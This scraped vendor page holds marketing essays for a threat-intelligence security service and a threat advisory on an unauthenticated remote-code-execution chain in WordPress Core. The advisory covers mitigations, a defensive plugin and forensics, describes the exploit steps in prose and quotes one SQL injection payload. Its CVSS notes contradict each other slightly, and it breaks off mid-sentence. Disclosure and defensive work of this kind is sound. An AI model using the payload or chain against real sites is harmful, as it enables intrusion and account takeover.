It’s Part of the SolutionCut the costs, the noise, and the strain. Intelligence powered cybersecurity helps you save where it counts—your budget, your team, and your time. The World’s Largest Collection of Threat Intelligence at Your Service --- ### [The Overwhelmed SOC](https://www.centripetal.ai/resources/the-overwhelmed-soc) Published: 2025-08-06 Summary: Security analysts are overwhelmed by a never-ending stream of security events generated from the network. Firewalls, Intrusion Detection Systems (IDS), servers, and Identity Access Systems (IAS) all… The Overwhelmed SOC: Are Your Analyst Teams Burned Out? Security analysts are overwhelmed by a never-ending stream of security events generated from the network. Firewalls, Intrusion Detection Systems (IDS), servers, and Identity Access Systems (IAS) all produce high volumes of logs. These logs are further augmented by analysis from Endpoint Detection and Response (EDR) systems, network traffic tools, and vulnerability assessment tools. All of these events are funnelled into a Security Information and Event Management (SIEM) or Log Management Tool.Despite the availability of tools designed to distill these logs into actionable security alerts, security analysts still face the daunting task of overseeing potentially millions of security events. Their goal is to identify and detect malicious activity amidst the vast volumes of data.Even with increasingly advanced automation, a typical organization generates thousands of security alerts daily. Each of these alerts requires investigation by highly skilled but often exhausted security analysts. Wrestling, grappling and negotiating the sheer volume of alerts – while simultaneously trying to focus on other pertinent security requirements – results in alert fatigue.  Analysts, inundated with alerts, are becoming desensitized, leading to missed or overlooked threats. Many enterprises relate stories of analysts spending hours clearing false positives, deduplicating events and filtering through the noise.  This is untenable, inefficient and ineffective use of expensive resources.Moreover, the costs associated with storing and managing events are significant. This, combined with regulatory and compliance requirements around retention of data, are introducing considerable costs for even small security operations. While the overall intent behind the regulations is honorable and purposeful, the impact on businesses who are already crippled by cybersecurity costs is unsustainable.A typical medium-sized business might see millions of security events per day – which could easily result in several hundred thousand alerts that a security team is expected to  analyze.Naturally they will focus on the highest priority alerts and implement strategies for automating remediation wherever possible. But there is an inherent risk that they will miss key indicators to malicious activity and adopt a ‘best effort’ approach based on the amount
of time and resources available.Unsurprisingly, teams are burned out. They are exhausted, and potentially becoming disillusioned with the constant drudgery of monotonous event management, resultingin a lack of variety in their roles.The current approach is not sustainable. Organizations need to look to a more preemptive solution, one that monitors and shields malicious traffic, or identifies sources of reconnaissance traffic and blocks them. That in turn, significantly reduces cyberattack traffic, which is crippling the organization in so many ways.“This morning I had zero alerts. I refreshed three times just to make sure. Sure enough we had no alerts thanks to Centripetal.”Incident Response AnalystInformation Technology at a Pacific Gaming Casino Alert VolumesFor even mid-sized businesses with a moderate cybersecurity infrastructure, the volume of alerts generated daily can be substantial.Many organizations face the daunting task of processing tens of millions of events each day, leading to thousands of security alerts requiring prioritization and triage. While individual alerts are often dismissed as false positives or non-critical, a trained analyst can recognize patterns of activity that may indicate a more significant threat.However, as alert volumes rise beyond manageable levels, the effectiveness of analysts diminishes. Adding more analysts may seem like a solution, but it is rarely feasible in today’s competitive market.Event Storage CostsCybersecurity best practices require organizations to generate, store, and retain security event data across their networks. This data supports essential activities such as security analysis, incident reporting, and forensic investigations. Many organizations also face regulatory requirements mandating event retention for extended periods—anywhere from six months to three years—resulting in considerable costs that consume a significant portion of the cybersecurity budget.Initial and operational expenses for a SIEM operation can be substantial. According to Blumira and Cybool, setup and integration of a SIEM can range from $70,000 to $440,000, with ongoing costs influenced by data volume, storage, and management. For example, analyzing 500GB/day can lead to expenses exceeding $525,000 annually. Some vendors may also use pricing models based on data ingestion or the number of endpoints, which can add variability and increase costs exponentially.The volume of event data increases alert generation which in turn drives up costs for analysis tools, management services, storage infrastructure,and staffing. For many organizations, this becomes increasingly uncontrollable, costly and can impact profitability. The solution is not to eliminate valuable security insights, but rather to reduce unnecessary security events. Organizations need to adopt more innovative approaches, like leveraging contextualized cybersecurity threat intelligence, to improve results without escalating costs.Artificial Intelligence (AI)Organizations are turning to AI-based tools to address the alert overload problem. Automating repetitive, data-centric tasks is a natural application of AI, and event and alert management is a prime candidate for this technology. For AI to make effective decisions however, it must integrate global threat intelligence insights to triage alerts accurately. The synergy of artificial intelligence and threat intelligence, applied in real-time, can significantly reduce alert volumes, freeing security analysts to focus on higher-value tasks.Event SaturationLogging network events is both an industry best practice and a regulatory mandate. Although the volume and granularity of logged events vary, most organizations strive to capture sufficient data for threat hunting, forensic investigations, and incident reporting. However, managing, storing, and processing large volumes of event data can become burdensome.While SIEM technologies offer powerful capabilities for event correlation and alerting, they are often costly due to the sheer volume of data they preside over. More data doesn’t necessarily equate to greater protection and improved security posture. Our experience indicates that by applying global threat intelligence to provide context to events and create meaningful alerts, effective decisions can be made. Automating and streamlining this process, with modern technologies can significantly reduce the alert volumes, ensuring the most critical ones are identified based on the risk they bring to the network.Employee ChurnAlert fatigue often leads to dissatisfaction among cybersecurity analysts, impacting their job satisfaction and engagement. While cybersecurity roles can be highly rewarding, analysts thrive on engaging, dynamic work that challenges their skills and allows them to see the impact of their contributions. When their work is dominated by repetitive tasks and an endless stream of alerts, they may feel undervalued and unmotivated. Without opportunities for skill development in threat hunting or meaningful contributions to security outcomes, analysts are more likely to look for new roles elsewhere, especially given the high demand for cyber talent across industries. Retaining skilled professionals should be a priority for organizations, as the costs of recruiting and onboarding new talent can quickly escalate. Reducing alert fatigue and involving analysts in decisions around tools, processes, and intelligence strategies can boost morale and build stronger loyalty. When analysts have the right tools and support, they feel more empowered to protect the organization, leading to greater job satisfaction and lower turnover.For example, reconnaissance traffic—which can constitute up to 90% of network noise—generates an overwhelming number of events. Eliminating this traffic before it enters the network can dramatically reduce event and alert loads. Centripetal’s CleanINTERNET® solution uses global threat intelligence to identify sources of reconnaissance traffic and block them, significantly reducing the alert load and limiting threat actors’ visibility into network assets. Increasing automation and leveraging AI in alert management also brings substantial value. While numerous tools offer automated threat monitoring, businesses are understandably cautious about missing critical alerts that could be vital for attack detection and response. By leveraging threat intelligence at scale, Centripetal’s CleanINTERNET® prioritizes security alerts based on business risk. The CleanINTERNET® Advanced Threat Detection capabilities utilize AI and a range of sophisticated detection techniques to automate threat monitoring operations. Security analysts provide oversight, conduct further analysis as needed, and relay key insights to customers.While reducing alert fatigue is a strategic goal, organizations must ensure that security coverage is not compromised. Broad tactics that reduce visibility into security threats can hinder threat detection and post-incident analysis.Centripetal’s CleanINTERNET® maintains full visibility into all events and provides a suite of tools that enable customers to analyze and inspect activity, supporting comprehensive threat management and response.“I did some spot checking on the firewall logs before Centripetal, 60 million before [the] appliance was implemented, down to 500,000 the other day.”Senior Cybersecurity ArchitectNortheast Healthcare ProviderCentripetal changes the game in cybersecurity, enabling even small IT teams to be massively effective in preventing cyber attacks.  Investment in CleanINTERNET® alleviates you and your teams from the many aspects of alert fatigue outlined above – alert overload, storage costs, event management, event saturation, AI and employee churn.By lowering operational costs, enhancing visibility, and maintaining comprehensive threat protection, CleanINTERNET® provides a sustainable path forward for organizations looking to secure their networks without compromising quality or exhausting resources. As cybersecurity demands continue to rise, solutions like CleanINTERNET® stand as essential tools, enabling even small IT teams to make a significant impact in preventing cyber attacks and protecting valuable assets. ConclusionOrganizations need intelligent, proactive solutions to address the growing challenges of alert fatigue and event saturation. Centripetal’s CleanINTERNET® offers a transformative approach to cybersecurity, enabling companies to shift from reactive to proactive defense by leveraging real-time global threat intelligence,AI-driven insights, and robust automation. This approach not only reduces the overwhelming volume of security alerts but also empowers security analysts to focus on high-priority threats, thereby improving the efficiency and effectiveness of security operations. --- ### [CleanINTERNET for DNS](https://www.centripetal.ai/resources/cleaninternet-dns) Published: 2025-08-06 DNS, the directory service for the internet, is an intrinsic element of how we communicate online. By resolving domain names into IP addresses, DNS delivers enormous value and yet is transparent to most of us. However the internet is rampant with malicious activity and DNS can be complicit in enabling hackers to misdirect and defraud users.Over 80% of breaches occur from human error, and over half of employees fall prey to phishing emails that connect to known malicious websites. Despite the constant effort to train employees on cyber safety and best practices, caution is a short-lived human behavior. A DNS lookup can lead to a user accessing malicious content which may result in communication with command & control servers, exfiltration of data from network assets, or propagation of threats across business-critical networks. CleanINTERNET® DNS protects your entire organization by shielding against malicious sources and harmful content.CleanINTERNET® DNS safeguards against network infiltration and data exfiltration and increases your organization’s cyber security posture.CleanINTERNET® DNS gives your business cyber security protection against web-based malicious threats and is more comprehensive than other DNS filtering products by applying advanced threat intelligence, not just blocklists, to prevent users from accessing malicious websites and content.CleanINTERNET® DNS does not require additional hardware, is fully managed, and requires no extensive internal resources. CleanINTERNET® DNS is implemented in minutes by easily routing traffic to Centripetal’s CleanINTERNET® DNS cloud server. --- ### [CleanINTERNET for AWS Cloud Environments](https://www.centripetal.ai/resources/cleaninternet-for-aws-cloud-environments-2) Published: 2025-08-06 Businesses are seeing significant value from the ongoing migration of key resources into the cloud. Public cloud infrastructure allows for tremendous flexibility of deployment and the ability to scale applications rapidly. However, as critical infrastructure is moved to the cloud, enterprises need to be fully aware of increased security risks of a larger attack surface and greater exposure.It is widely known that there is an increasing occurrence of cloud breaches. Indeed, these breaches have now surpassed on-prem breaches, and more cybersecurity incidents are impacting external cloud assets than internal ones.Any asset deployed in the cloud is a potential target for hackers. Many enterprises have accidentally exposed critical data via their public cloud infrastructure because of misconfigurations or lax policies and have learned expensive lessons…Cloud security is driving significant new cybersecurity spending. With the emergence of new cyber-attack vectors, powered by AI and facilitated by a proliferation of high severity vulnerabilities, organizations are increasing their cloud and cybersecurity budgets to deliver protection from omnipresent cyber threats.Now available as a cloud-based deployment, Centripetal’s CleanINTERNET® service is a revolutionary approach to defending your assets from cyber threats by leveraging dynamic threat intelligence on a mass scale. Using patented technology, Centripetal CleanINTERNET® is a cost-effective cybersecurity solution that protects organizations from a wide variety of cyber threats from cybercriminals, hacktivists, and hostile nations, as well as campaigns involving malware, spam, phishing, and scanning.Centripetal CleanINTERNET® protects your assets in the cloud and enforces cybersecurity policies by applying billions of IOCs that monitor and bi-directionally shield with no disruption to business processes.CleanINTERNET® is available for AWS and Azure environments. It can be easily deployed to protect your application and data storage assets in the cloud, providing a robust security layer that leverages the very latest threat intelligence.BenefitsAchieve greater security for your cloud deployed assets and infrastructureAchieve immediate risk reduction with rapid, flexible, and scalable deploymentAvail of optional high availability capabilities to support sensitive and valuable servicesControl security costs and complexity by availing of a highly effective intelligence-powered defenseProtect against active exploits even before vulnerabilities are identifiedWhile there are many approaches to cyber security in the cloud, the costs involved in deploying a full security stack can be challenging. If you are a customer of Centripetal’s CleanINTERNET® cybersecurity service, you will already be aware of the significant cost savings that can be achieved. This is even more evident in a cloud environment where CleanINTERNET® can have an immediate impact in reducing malicious traffic. --- ### [CleanINTERNET DNS for Google Cloud Platform](https://www.centripetal.ai/resources/google-cloud) Published: 2025-08-06 DNS, the directory service for the internet, is an intrinsic element of how we communicate online. By resolving domain names into IP addresses, DNS delivers enormous value and yet is transparent to most of us. However the internet is rampant with malicious activity and DNS can be complicit in enabling hackers to misdirect and defraud users.CleanINTERNET® DNS for Google Cloud protects your Google Cloud Environment by shielding against malicious sources and harmful content.CleanINTERNET® DNS for Google Cloud safeguards against network infiltration and data exfiltration and increases your organization’s cyber security posture.CleanINTERNET® DNS for Google Cloud gives your business cyber security protection against web-based malicious threats and is more comprehensive than other DNS filtering products by applying advanced threat intelligence, not just blocklists, to prevent users from accessing malicious websites and content.CleanINTERNET® DNS for Google Cloud does not require additional cloud resources, is easy to configure and is fully managed.CleanINTERNET® DNS for Google Cloud is implemented in minutes by updating your DNS configuration in your Google Cloud environment to Centripetal’s CleanINTERNET® DNS for Google loud resolvers. Additional BenefitsCleanINTERNET® DNS for Google Cloud is deployed entirely on Google Cloud.The native deployment to Google Cloud maximizes performance and minimizes cost by keeping the DNS requests from your Google Cloud environment on Google Cloud’s global private network.There is added privacy from DNS requests not going over the open internet.CleanINTERNET® DNS for GCP supports region pinning to select supported Google Cloud regions.Coming soon, CleanINTERNET® DNS for Google Cloud will be available in the Google Cloud Marketplace for fully integrated billing and provisioning through your Google Cloud account. --- ### [The Crippling Costs of Bloated Perimeter Defense Solutions](https://www.centripetal.ai/resources/the-crippling-costs-of-bloated-perimeter-defense-solutions) Published: 2025-08-01 The Crippling Costs of Bloated Perimeter Defense SolutionsAs cyber threats continue to evolve in complexity, organizations face growing financial burdens to maintain robust network perimeter defenses. The total cost of implementing and managing these solutions has escalated significantly due to the need for advanced technologies and continuous monitoring. Firewall technology vendors are taking advantage of their position by charging enormous subscription fees for various capabilities and functions that most organizations do not need. Additionally, the expansion of functionality at the firewall makes them more vulnerable. Below we discuss the various cost components and their contributions to overall expenses. Total Annual Cost of Ownership: $636,710The cumulative annual cost for maintaining this bloated network perimeter defense amounts to an estimated $636,710 USD, excluding the potential costs of scaling resources, handling incident responses, and training personnel.Cost Drivers and Industry TrendsEscalating costs are driven by the following factors: Increased Threat ComplexityCybercriminals are deploying sophisticated tactics, necessitating advanced tools such as ATP, sandboxing, and real-time threat intelligence. Growing Data VolumesAs organizations generate more data, the costs of event management systems and storage solutions rise significantly, as evidenced by the 100GB per day cost for MS Sentinel. Compliance and Regulatory PressureRegulatory frameworks mandate heightened security standards, pushing organizations to adopt expensive, high-performance solutions. Skills ShortageThe high demand for skilled cybersecurity professionals adds to costs, particularly in areas like SOC monitoring. While the costs associated with traditional network perimeter defense solutions are substantial and largely out of control, an effective alternative is available. By adopting threat intelligence-driven approaches to proactively defend the network perimeter and understanding that the primary role of a firewall is to delineate the network rather than serve as its sole protector, enterprises can achieve meaningful cost efficiencies. Centripetal’s CleanINTERNET solution enables organizations of all sizes to enhance security while safeguarding critical assets, ensuring regulatory compliance, and preserving customer trust. The High Price of Legacy Security*Hardware and Initial Capital Investment$86,311 upfront capitalA next generation firewall for a medium sized business incurs an upfront capital outlay of $86,311 which equates to annual costs of approximately $28,000.Additional tools, such as a firewall management platform to streamline and enhance administrative efficiency, costs $11,290 annually.Licensing and Subscriptions$35,560 annual costsAdvanced features like Advanced Threat Prevention (ATP), URL Filtering, and Sandboxing each contribute to $35,560 annually in costs.Other essential subscriptions include VPN at $23,710, DNS at $23,710, and SD-WAN at $23,710.Monitoring and Intelligence Services$180,000 annual costsThreat intelligence tools, such as Autofocus, which enable real-time updates on emerging threats, add annual costs of $35,000.SOC Monitoring Services, essential for managing assets, require a significant investment of $180,000 annually to cover 1000 assetsData-Driven Event Management$124,000 annual costsThe demand for high-capacity event logging and management solutions is evident with MS Sentinel event management costs. At 100GB per day, this totals annual costs of $124,000.Specialized Tools and Services$47,420 annual costsData Loss Prevention (DLP) technologies that address risks related to sensitive information breaches incur $47,420 in annual costs. *Note: Prices are based on leading vendors list pricing for a typical medium-sized enterprise  --- ### [The Big Data Challenge in Cybersecurity](https://www.centripetal.ai/resources/the-big-data-challenge-in-cyber) Published: 2025-07-01 The Big Data Challenge
in CybersecurityThreat intelligence is powerful, but it’s only effective if you can manage the scale, dynamics and fidelity of data. Volume and scaleHundreds of providers and millions of indicators of compromise daily means the sheer volume of intelligence demands real-time operationalization at scale.Frequently Changing DynamicsHundreds of millions of changes occur every single day, far too many for any firewall or SECOPS strategy to keep up.Fidelity and AccuracyThe complexity of ensuring that high-fidelity, relevant intelligence is applied makes it difficult to stay fully protected. Incomplete CoverageWith less than 3% overlap across  providers, relying on a single source means missing critical threats and leaving your defenses vulnerable. Resolving the Challenges of Threat IntelligenceAn intelligence powered cybersecurity strategy with CleanINTERNET delivers real-time dynamic and comprehensive intelligence powered protection Operationalizing Intelligence at ScaleProcessing millions of indicators of compromise every day in real-time utilizing 110 patented technologies – turning intelligence overload into actionable insights without delay. Real-Time Threat Landscape AdaptionAutomatically updates as threats evolve, ensuring near real-time protection against every known threat.  High-Fidelity ApplicationAutomatically applying  high-fidelity intelligence, eliminating the burden on your security team and ensuring only the most relevant data is used. Extensive CoverageWith the world’s largest collection of threat intelligence, coverage gaps are filled, keeping your defenses comprehensive and up-to-date. --- ### [The Firewall Fallacy](https://www.centripetal.ai/resources/the-firewall-fallacy) Published: 2025-06-03 The Firewall FallacyAddressing the Failing FirewallToday’s cyberwarfare leaves traditional enterprise firewalls floundering. Vendor attempts to evolve them into “Next Generation” technology can’t mask the harsh reality: firewalls are outmatched and blindsided by the ever-growing arsenal of attacks. Today’s security revolution is far beyond the legacy firewall. That appliance was never meant to dynamically triage the risk of every single connection using all global knowledge, and to do all of that in thousandths of a second (10^-6). That’s what it takes today to close the detection to protection gap. Despite being hailed as the first line of defense, firewalls consistently fail in the Era of Intelligence. Every major data breach has waltzed right past one, exposing sensitive data.In fact, in 100% of data breaches, there was a firewall, often the most modern variant, in place. So, should I throw mine away? No. The systemic vulnerability stems from a functional crisis. The firewall is designed for network segmentation and for defining an enterprise’s specific, static usage policy. That is an important corporate security investment that is custom and should be kept. The impossible burden arises with the idea that the legacy firewall will somehow evolve through bolt on packages to track and discriminate every global connection, by jamming in patches and a pointlessly small set of blunt rules. This is a recipe for disaster. Most organizations lack the resources to even adequately manage static firewall rules of just several thousand. Policy analysis tools routinely find rule conflict and policy “shadows” which violate policy in even this simple set. Dynamic intelligence tracking is today on the order of tens of billions in aggregate with a daily flux of over one billion valid threat changes.  No organization can run an effective intelligence-based security operations in the firewall. No firewall can process that set of data.Enterprises face a cybersecurity spending conundrum. They must not throw good money after bad, doubling down on a failing firewall to try to drag it into an inevitable slaughter in the intelligence domain. It’s time to face that challenge with a specialist. The security challenge has fundamentally changed. While core segmentation and enterprise acceptable use policy remain very important layers of defense the frontline of modern cyber is intelligence powered defense.Fundamental FailingsAdvanced threats bypass firewalls with ease, sneaking malware in through phishing attacks or by exploiting internal vulnerabilities. These firewalls often lack the muscle to stop malware from reaching out, phoning home to malicious servers, and stealing data.Firewalls struggle in today’s dynamic threat landscape. They rely on outdated methods like static IP deny lists, essentially checking packets one by one. This linear approach can’t keep up with the ever-changing tactics of attackers. Legacy firewalls are also inflexible, limited in the number of rules they can handle and susceptible to misconfigurations. The real solution lies in threat intelligence, but firewalls simply aren’t built to take advantage of vast amounts of threat data or make real-time decisions. They lack the ability to distinguish malicious traffic from legitimate, without disrupting network operations.Modern attackers exploit this rigidity. They can quickly spin up cloud-based infrastructure that appears legitimate, rendering firewalls blindsided. Relying solely on firewalls is a recipe for disaster. Instead of acting as a shield, firewalls have become data spewing machines, bombarding SIEM or log management systems with event data in the hope of uncovering threats. Given the lightning-fast attack landscape, where threats can activate within minutes, this approach is delusional. Security teams drown in a never-ending deluge of alerts, unable to keep pace. There must be a better way.Centripetal CleanINTERNET®Centripetal breaks the mold, disrupting the status quo, with a revolutionary approach to network defenses. We leverage the power of threat intelligence, applied wholesale at the network’s edge, to keep you protected. The following chart clearly illustrates the stark contrast between legacy firewalls and the game-changing power of CleanINTERNET® powered by threat intelligence. What is our customers experienceCentripetal’s customers consistently report  a significant improvement in their overall security posture after deploying CleanINTERNET®.Here’s how CleanINTERNET® helps security teams: Benefits of Centripetal CleanINTERNET®Centripetal’s CleanINTERNET® uses an advanced intelligence driven gateway, which we term the RuleGATE®, that is your delivery point to a secure internet. The RuleGATE® is a software-based system that can be deployed on any speed link and in both physical and cloud environments.Centripetal’s RuleGATE® has been independently verified to be the highest performance network filter in existence. It provides network filtering with undetectable latency ensuring no disruption to your critical business operations.This powerful security gateway seamlessly integrates with your existing IT infrastructure, acting as a robust shield at the network boundary. By harnessing the power of CleanINTERNET® and RuleGATE®, you gain a significant boost to your overall security posture.Service features include:Reduced workload by 90-95%:CleanINTERNET® significantly reduces the number of security alerts requiring human review, freeing up security teams to focus on strategic initiatives.Advanced Threat Detection:Uncover hidden threats with deep packet inspection, payload analysis, and PCAP collection. We even handle encrypted traffic for comprehensive protection.Unmatched Threat Intelligence:Centripetal monitors a massive network of over 250 threat intelligence providers, curating 3,500 feeds to deliver the most relevant and cost-effective coverage for your business. This intelligence is constantly updated, with 4 billion IOC changes processed daily.Streamlined Security Operations:CleanINTERNET®'s shielding mode prioritizes critical traffic, allowing your security team to focus on advanced threat detection with fewer distractions.Unmatched Threat Intelligence:Centripetal monitors a massive network of over 250 threat intelligence providers, curating 3,500 feeds to deliver the most relevant and cost-effective coverage for your business. This intelligence is constantly updated, with 4 billion IOC changes processed daily.ConclusionCyberattacks are a constant threat, putting immense pressure on businesses to fortify their networks. IT managers understand their vulnerabilities, but limited budgets often hold them back. Traditional firewalls have become a costly burden, draining resources with technology, management, event storage, and potential outsourcing fees.Centripetal offers a smarter solution. By leveraging a powerful global threat intelligence network, we deliver a new layer of defense that saves you money and significantly strengthens your security posture. Don’t settle for ineffective defenses. Embrace a new, intelligence-driven approach with Centripetal. --- ## Threat Reports ### [wp2shell: Critical Unauthenticated RCE Chain in WordPress Core](https://www.centripetal.ai/threat-research/wp2shell-critical-unauthenticated-rce-chain-in-wordpress-core) Published: 2026-07-22 Summary: wp2shell is a critical, actively exploited WordPress Core flaw enabling unauthenticated remote code execution on default installations. wp2shell is a critical pre-authentication remote code execution chain in WordPress Core that requires no plugins and affects default installations. In-the-wild exploitation has been confirmed, and administrators must immediately update to WordPress 6.9.5, 7.0.2, or 7.1 beta2.The vulnerability was publicly disclosed on July 17, 2026, and patched the same day in WordPress 7.0.2, 6.9.5, and 7.1 beta2. Due to its severity, WordPress.org also enabled forced auto-updates across affected sites (WordPress, 2026).The flaw chains together two bugs: a REST API batch-route confusion vulnerability in the default /wp-json/batch/v1 endpoint, tracked as CVE-2026-63030, which smuggles attacker-controlled input into an SQL injection in WP_Query's author__not_in parameter, tracked as CVE-2026-60137 (The Hacker News, 2026). When chained, the vulnerabilities allow an anonymous HTTP request to result in the creation of a rogue administrator account and ultimately lead to code execution.The batch-route confusion bug was discovered and responsibly disclosed by Adam Kues of Assetnote/Searchlight Cyber, while the SQL injection was reported separately by TF1T, dtro, and haongo (WordPress, 2026). Unlike most WordPress security issues, which originate in plugins or themes, wp2shell exists in WordPress Core, affects bare installations, and is reachable through the batch endpoint, which is enabled by default (Eye Security, 2026).Vulnerability Type (CWE)The official WordPress GHSA advisories assigned no CWEs. The CWEs below come from the WPScan CNA and CISA-ADP CVE records (WPScan, 2026; CISA-ADP, 2026).CWE-89: Improper Neutralization of Special Elements used in an SQL Command (SQL Injection) Assigned to CVE-2026-60137 by both WPScan (CNA) and CISA-ADP. The author__not_in query var accepts a scalar string that is interpolated directly into raw SQL with no escaping when the input is not an array.CWE-436: Interpretation Conflict Assigned to CVE-2026-63030 by both WPScan (CNA) and CISA-ADP. The batch endpoint's parallel $matches / $validation array desync lets a validated request execute under a different request's handler, bypassing parameter sanitization and the method allow-list. CVE-2026-63030 Base Score: 7.5 (High) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Privileges Required: None (PR:N) User Interaction: None (UI:N) Scope: Unchanged (S:U) Confidentiality: High (C:H) Integrity: None (I:N) Availability: None (A:N) CVE-2026-60137 Base Score: 9.1 (Critical) Attack Vector: Network (AV:N) Attack Complexity: Low (AC:L) Privileges Required: None (PR:N) User Interaction: None (UI:N) Scope: Unchanged (S:U) Confidentiality: High (C:H) Integrity: High (I:H) Availability: None (A:N) 💡CVE-2026-63030 — NIST/NVD has not officially assigned a CVSS base score yet. WPScan originally assigned a Base Score of 9.8 (Critical), but the National Vulnerability Database via CISA-ADP lowered it to 7.5 (High) due to its limited standalone impact. 💡CVE-2026-60137 — NIST/NVD has not officially assigned its own CVSS base score yet. WPScan originally assigned a Base Score of 5.9 (Medium), but the National Vulnerability Database via CISA-ADP elevated it to 9.1 (Critical) due to its limited standalone impact. Impacted VersionsThe two vulnerabilities affect different WordPress versions, which determines the level of exposure. The SQL injection affects versions dating back to 6.8, while the route-confusion flaw—and therefore the full RCE chain—only affects versions 6.9 and later.Version RangeExposureFixed In< 6.8.0Not affected—6.8.0 – 6.8.5SQL injection only (no RCE chain)6.8.66.9.0 – 6.9.4Full unauthenticated RCE chain6.9.57.0.0 – 7.0.1Full unauthenticated RCE chain7.0.27.1 betaFull unauthenticated RCE chain7.1 beta2Narrowing conditionThe code-execution path depends on the site not using a persistent external object cache, such as Redis or Memcached, because those caches change how the underlying query is constructed. According to Cloudflare, this may reduce the blast radius for some larger deployments, but it provides no protection for standard WordPress installations, which do not use an external object cache by default. This is an incidental side effect, not a fix, and it does not prevent exploitation of the SQL injection. A default installation running an affected version of WordPress Core is sufficient exposure.Mitigation StepsCheck if your instance is vulnerable at wp2shell.com/. If it is, update immediately—this is the only effective fix. Do not assume the forced auto-update reached your site; confirm the installed WordPress version directly in your dashboard.WordPress BranchMitigation6.8.xUpdate to 6.8.6 (patches SQLi only)6.9.xUpdate to 6.9.57.0.xUpdate to 7.0.27.1 betaUpdate to 7.1 beta2If you cannot update immediately, all temporary mitigations should focus on preventing unauthenticated requests from reaching the batch endpoint. These measures may disrupt legitimate REST integrations and should be treated only as short-term stopgaps (Searchlight Cyber, 2026):Block both /wp-json/batch/v1 and requests using the query parameter rest_route=/batch/v1 at the WAF. Cloudflare's managed WAF blocks the exploit chain for sites behind its network. However, blocking the endpoint can break the WordPress Block Editor (Gutenberg) and several modern plugin dashboards that rely heavily on the batch API to save data. Use this only as an absolute last resort if patching is delayed.Install the Disable WP REST API plugin to block unauthenticated REST API access entirely.Deploy a must-use plugin that rejects unauthenticated requests to /batch/v1 at rest_pre_dispatch. The WordPress advisory provides an example implementation (WordPress, 2026):<?php /** * Plugin Name: Disable Unauthenticated REST Batch API * Description: Requires an authenticated WordPress user for REST batch requests. * Version: 1.0.0 * Requires at least: 5.6 * License: GPL-2.0-or-later */ defined( 'ABSPATH' ) || exit; function wporg_require_authentication_for_rest_batch( $result, $server, $request ) { if ( '/batch/v1' !== strtolower( untrailingslashit( $request->get_route() ) ) || is_user_logged_in() ) { return $result; } return new WP_Error( 'rest_batch_authentication_required', 'Authentication is required to use the batch API.', array( 'status' => 401 ) ); } add_filter( 'rest_pre_dispatch', 'wporg_require_authentication_for_rest_batch', -1000, 3 ); Reset passwords even on SQL-injection-only sites running WordPress 6.8.x. The SQL injection can read the wp_users table, meaning an attacker may already have obtained password hashes. Force a password reset for every account, prioritizing administrators, rotate all API keys, and instruct users to change any passwords they reused elsewhere. Patching alone does not protect sites that may have been compromised before the update was applied (Eye Security, 2026).Linux Forensics & Incident ResponseLet the database rows and file timestamps lead; use logs only to corroborate source IP, timing, and entry point.Database (primary evidence) Dump wp_users, wp_usermeta, and wp_options from a copy via mysqldump, not the live DB. Look for unexpected admin rows and the artifacts above.Web root (/var/www/html or the site docroot) Hunt recently modified/created PHP files — find DOCROOT -name "*.php" -newermt "2026-07-16" -printf "%TY-%Tm-%Td %TH:%TM %p\n" is a fast first pass. For a faster, highly reliable check of core file integrity, run wp core verify-checksums via WP-CLI. This will instantly flag any core files the attacker modified to plant a backdoor.Web server logs (/var/log/apache2/, /var/log/nginx/) Access log shows the batch entry point and any later webshell hits, but not the injection. The Apache error.log can leak an injected query if a UNION threw a SQL syntax error.PHP / FPM logs (/var/log/php*-fpm.log, per-directory error_log) Fatal errors/warnings around the intrusion window corroborate.Sessions & temp (/var/lib/php/sessions/, /tmp) Dropped payloads or staging files.System & auth (/var/log/auth.log or secure, ~/.bash_history for www-data and service accounts, /etc/crontab, /etc/cron.*, per-user crontabs, /etc/passwd) Persistence and added local accounts.Preserve evidence before beginning remediation. Create read-only images of the database and web root before making changes.Exploit ProcessA fully functional proof of concept has been publicly available on GitHub since shortly after disclosure and has been independently verified to execute the complete attack chain against an affected default installation (Icex0, 2026; Eye Security, 2026). Searchlight delayed publishing its technical analysis to give defenders the weekend to respond. However, because WordPress Core is open source and the security release identified the modified files, other researchers were able to reverse-engineer the patch and publish details of the exploit mechanism within a day (The Hacker News, 2026). The exploit chain proceeds as follows (Searchlight Cyber, 2026):Route confusion (CVE-2026-63030) The unauthenticated /wp-json/batch/v1 endpoint validates and executes sub-requests across three parallel arrays — requests, matches, and validation — inside WP_REST_Server::serve_batch_request_v1(). A malformed sub-request appends to validation but not matches (the continue skips it), shifting the arrays out of step by one. A validated request then executes under a different request's handler.Bypass the method allow-list The batch API rejects GET, but the SQLi sink is GET-only. The PoC nests the batch call recursively — the outer desync means the inner request's method field is never validated — allowing a GET to reach /wp/v2/posts.Reach the SQLi sink (CVE-2026-60137) Via the desync, author_exclude lands in WP_Query's author__not_in. A scalar string (rather than an array) skips the absint sanitization and is interpolated directly into raw SQL. A payload like 0) OR 1=1 -- confirms injection; UNION-based reads leak arbitrary DB values as a forged wp_posts-shaped row.Escalate to admin without cracking hashes UNION-forged fake posts poison the in-memory post cache; the oEmbed feature is abused to fabricate real oembed_cache rows, which are then recast (via cache/DB reconciliation and a self-parent cycle-detection gadget) into a customize_changeset that applies changes with administrator (user ID 1) authority. A crafted parse_request hook replays the batch request under the temporarily assumed admin role, allowing an embedded "create administrator" sub-request to succeed on the second pass.Code execution The attacker logs in as the generated administrator and uploads a backdoor plugin from a ZIP, achieving RCE.Steps 1 through 4 occur before authentication. Only the final plugin-upload step is authenticated as the attacker-created admin. A complete exploit may involve anywhere from a dozen to several dozen requests, with the critical actions embedded in batch POST bodies that rarely surface in access logs (Eye Security, 2026).Exploitation StatusMultiple security firms confirmed in-the-wild exploitation of unpatched WordPress instances on July 20, 2026 (SecurityWeek, 2026). This progression was expected: mass exploitation of WordPress vulnerabilities is well established, the proof of concept and patch are both public, and the bug affects default configurations—a combination that has historically led to widespread opportunistic scanning (The Hacker News, 2026). Rapid7 also released unauthenticated vulnerability checks for InsightVM and Nexpose in its July 20 content release (Rapid7, 2026). Treat this vulnerability as actively exploited and prioritize remediation immediately.TimelineDateEventPrior to July 17, 2026Vulnerabilities are disclosed to WordPress by Adam Kues (Searchlight Cyber / Assetnote) for CVE-2026-63030 and researchers TF1T, dtro, and haongo for CVE-2026-60137July 17, 2026WordPress releases security updates 6.9.5 and 7.0.2 to fix both flaws, enabling forced automatic updates globallyJuly 18, 2026Public Proof-of-Concept (PoC) exploit scripts for the full "wp2shell" chain begin circulating on GitHubJuly 20, 2026In-the-wild exploitation of unpatched WordPress instances is confirmed by multiple security 